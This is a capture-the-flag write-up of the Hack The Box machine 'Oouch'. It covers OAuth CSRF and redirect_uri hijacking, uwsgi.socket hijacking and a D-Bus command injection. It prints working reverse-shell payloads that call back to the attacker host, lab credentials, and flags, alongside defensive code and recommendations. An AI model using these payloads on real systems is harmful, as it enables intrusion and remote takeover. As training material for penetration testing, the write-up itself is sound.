[Meachines] [Hard] Oouch: OAuth + TRP00F + uwsgi.socket hijacking + D-Bus RCE privilege escalation
1089 words, 2025-08-22 12:23:06
Analysis of an attack chain from OAuth exploitation to privilege escalation
1. Information gathering and initial reconnaissance
1.1 Target identification
- IP address: 10.10.10.177
- Open ports:
  - 21/tcp: FTP (vsftpd 3.0.3), anonymous login allowed
  - 22/tcp: SSH (OpenSSH 7.9p1)
  - 5000/tcp: HTTP (nginx 1.14.2), the Oouch application
  - 8000/tcp: RTSP/HTTP, presumably the OAuth authorization service
1.2 Service enumeration
$ ip='10.10.10.177'; itf='tun0'
$ # Reachability check with a plain ping sweep; the original used -Pn together with -sn,
$ # which makes nmap report "Host is up" unconditionally and turns the check into a no-op.
$ if nmap -sn "$ip" | grep -q "Host is up"; then
    echo -e "\e[32m[+] Target $ip is up, scanning ports...\e[0m";
    # Full TCP and UDP port sweep, reduced to a comma-separated list for nmap.
    ports=$(sudo masscan -p1-65535,U:1-65535 "$ip" --rate=1000 -e "$itf" | awk '/open/ {print $4}' | cut -d '/' -f1 | sort -n | tr '\n' ',' | sed 's/,$//')
    if [ -n "$ports" ]; then
        echo -e "\e[34m[+] Open ports found on $ip: $ports\e[0m";
        # Version and default-script scan restricted to the discovered ports.
        nmap -Pn -sV -sC -p "$ports" "$ip";
    else
        echo -e "\e[31m[!] No open ports found on $ip.\e[0m";
    fi;
  else
    echo -e "\e[31m[!] Target $ip is unreachable, network is down.\e[0m";
  fi
1.3 FTP anonymous login
The file project.txt was found:
$ ftp anonymous@10.10.10.177
ftp> get project.txt
2. OAuth exploitation
2.1 Hostname resolution
$ echo '10.10.10.177 oouch.htb consumer.oouch.htb' >> /etc/hosts
$ echo '10.10.10.177 authorization.oouch.htb' >> /etc/hosts
2.2 OAuth flow analysis
- Consumer side (consumer.oouch.htb:5000):
  - /oauth/connect: initiates the authorization request
  - /oauth/connect/token: receives the authorization code
- Authorization side (authorization.oouch.htb:8000):
  - /oauth/authorize: handles authorization requests
  - /oauth/token: issues access tokens
2.3 CSRF + OAuth hijacking attack
Attack steps:
- The victim visits a crafted link:
  <a src='10.10.16.23/SUCCESS'>Click</a>
- The authorization flow is intercepted with Burp Suite:
  POST /oauth/authorize/ HTTP/1.1
  Host: authorization.oouch.htb:8000
  [...]
  client_id=UDBtC8HhZI18nJ53kJVJpXp4IIffRhKEXZ0fSd82&response_type=code&redirect_uri=http://consumer.oouch.htb:5000/oauth/connect/token&scope=read&csrfmiddlewaretoken=xO8jp5M6ErzlvR9qSQjGlCNUr59VgULWtWgtIoZ7pCaegYJJ2QBJBD7Qt89uCj87&redirect_uri=http%3A%2F%2Fconsumer.oouch.htb%3A5000%2Foauth%2Fconnect%2Ftoken&scope=read&client_id=UDBtC8HhZI18nJ53kJVJpXp4IIffRhKEXZ0fSd82&state=&response_type=code&allow=Authorize
- The redirect_uri parameter is changed to an attacker-controlled server:
  redirect_uri=http://10.10.16.23/session
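The hijack works because the authorization server accepts whatever redirect_uri the request carries, and the consumer completes the flow without a state value tied to the victim's session (the captured request has an empty state field). The following is an added example, not code from this writeup or from the Oouch application, of how both ends would reject such requests; the client_id and the registered redirect URI are taken from the request above, while the client registry and the session dict are assumptions of the example.

```python
import hmac
import secrets
from urllib.parse import parse_qs, urlsplit

# Constructed client registry: the client_id and redirect URI are the values
# captured in the request above; the dict layout is an assumption of this example.
REGISTERED_CLIENTS = {
    "UDBtC8HhZI18nJ53kJVJpXp4IIffRhKEXZ0fSd82": {
        "redirect_uris": ["http://consumer.oouch.htb:5000/oauth/connect/token"],
    },
}


def redirect_uri_allowed(client_id: str, redirect_uri: str) -> bool:
    """Authorization-server side (/oauth/authorize). RFC 6749 section 3.1.2.3
    calls for a simple string comparison against the registered URIs: no prefix,
    host-only or wildcard matching, so http://10.10.16.23/session is rejected and
    so are same-host variants that differ in port, path, query or fragment."""
    client = REGISTERED_CLIENTS.get(client_id)
    if client is None or "\r" in redirect_uri or "\n" in redirect_uri:
        return False  # unknown client, or a value that could split the Location header
    parts = urlsplit(redirect_uri)
    if not parts.scheme or not parts.netloc or parts.fragment:
        return False  # relative, malformed or fragment-bearing URIs never match
    return redirect_uri in client["redirect_uris"]


def start_flow(session: dict) -> str:
    """Consumer side (/oauth/connect). Mint a random state value, bind it to the
    user's session and return it for inclusion in the authorization request."""
    session["oauth_state"] = secrets.token_urlsafe(32)
    return session["oauth_state"]


def callback_ok(session: dict, query_string: str) -> bool:
    """Consumer side (/oauth/connect/token). The code is accepted only when the
    returned state equals the one this same session minted, so a code obtained
    by an attacker in their own flow cannot be bound to a victim's session."""
    qs = parse_qs(query_string)
    code = qs.get("code", [""])[0]
    state = qs.get("state", [""])[0]
    expected = session.pop("oauth_state", None)  # single use, whatever the outcome
    if not code or not state or expected is None:
        return False
    return hmac.compare_digest(state, expected)
```

With these checks a callback carrying the empty state from the captured request is refused, and an authorization request naming an unregistered redirect_uri never reaches the consent step.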
2.4 Creating a malicious OAuth application
- Log in with the developer credentials:
  Username: develop
  Password: supermegasecureklarabubu123!
- Register a new application:
  POST /oauth/applications/register/ HTTP/1.1
  Host: authorization.oouch.htb:8000
  Authorization: Basic ZGV2ZWxvcDpzdXBlcm1lZ2FzZWN1cmVrbGFyYWJ1YnUxMjMh
  [...]
  client_id=XrCJdV84GD8oHqk6n7B2jWJAhGAY8xRbYkpVOwbg
  client_secret=Gxcs7hJpp2LMrABEOekVSdkqMZJHPL1r29joPQVUOuULRvICwpJnnshfWzCIUSVFY7Rumx1nWFGgXEdH87ZRhgOvMTTyfcR5fAXnSnlDPIt8x0T6PQQAApN2yYjTX5tb
  redirect_uris=http://10.10.16.23/session
2.5 Obtaining an access token
$ curl http://authorization.oouch.htb:8000/oauth/token/ \
-d 'client_id=XrCJdV84GD8oHqk6n7B2jWJAhGAY8xRbYkpVOwbg&client_secret=Gxcs7hJpp2LMrABEOekVSdkqMZJHPL1r29joPQVUOuULRvICwpJnnshfWzCIUSVFY7Rumx1nWFGgXEdH87ZRhgOvMTTyfcR5fAXnSnlDPIt8x0T6PQQAApN2yYjTX5tb&redirect_uri=http://10.10.16.23/session&code=1GSzmFW6QE1KkSIDVmNrccKx8lRZUZ&grant_type=authorization_code'
2.6 Calling the API with the token
GET /api/get_user HTTP/1.1
Host: authorization.oouch.htb:8000
Authorization: Bearer Zc2sUB0hjJwjacnUiVgXYzKdO1CeGe
3. Obtaining initial access
3.1 Retrieving the SSH private key
GET /api/get_ssh HTTP/1.1
Host: authorization.oouch.htb:8000
Authorization: Bearer Zc2sUB0hjJwjacnUiVgXYzKdO1CeGe
3.2 User flag
c4288c0c23f0b95affafdf00c6307b0d
4. Privilege escalation: the TRP00F attack
4.1 Using the TRP00F tool
$ python trp00f.py --lhost 10.10.16.23 --lport 10022 \
--rhost 10.10.16.23 --rport 10090 \
--http 10091
4.2 Obtaining www-data privileges
5. Container escape: uwsgi.socket hijacking
5.1 Internal network scan
$ ./nmap -sn 172.18.0.0/24 -oG - | awk '/Up$/{print $2}'
$ ./nmap -p- -T4 172.18.0.2 172.18.0.3 172.18.0.4 172.18.0.5
5.2 Using uwsgi_exp.py
$ sed '/import b/d' exp.py -i
$ echo 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.16.23",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")' > /tmp/rev.py
$ python exp.py -m unix -u /tmp/uwsgi.socket -c 'python /tmp/rev.py'
6. D-Bus RCE privilege escalation
6.1 Analysing the vulnerable code
/code/oouch/routes.py contains the following dangerous code: the client address is passed straight to the privileged D-Bus Block method, and nothing checks that it is actually an IP address.
# When an XSS attempt is detected
bus = dbus.SystemBus()
block_object = bus.get_object('htb.oouch.Block', '/htb/oouch/Block')
block_iface = dbus.Interface(block_object, dbus_interface='htb.oouch.Block')
client_ip = request.remote_addr or request.environ.get('REMOTE_ADDR')
response = block_iface.Block(client_ip)
6.2 Crafting the malicious request
# dbus.py
import sys
sys.path.insert(0, "/usr/lib/python3/dist-packages")
import dbus
bus = dbus.SystemBus()
block_object = bus.get_object('htb.oouch.Block', '/htb/oouch/Block')
block_iface = dbus.Interface(block_object, dbus_interface='htb.oouch.Block')
# Command injection: the D-Bus service interpolates this value into a shell command
client_ip = '1.1.1.1;bash -c "bash -i >& /dev/tcp/10.10.16.23/443 0>&1" #'
response = block_iface.Block(client_ip)
print(response)
bus.close()
6.3 Obtaining root
Running the script above yields a root shell.
6.4 Root flag
6840699ac07f229d83a1863ddb97c3f4
7. Summary
This attack chain shows the complete path from OAuth exploitation to final privilege escalation. The key points are:
- A CSRF weakness in the OAuth authorization flow
- Insecure validation of the redirect_uri parameter
- A man-in-the-middle attack carried out with the TRP00F tool
- Container escape via hijacking of uwsgi.socket
- A command injection flaw in the D-Bus interface
Defensive recommendations:
- Validate redirect_uri strictly (exact match against the registered URIs)
- Implement CSRF protection (a state value bound to the session)
- Enforce input validation on the D-Bus interface
- Isolate the container network
- Apply the principle of least privilege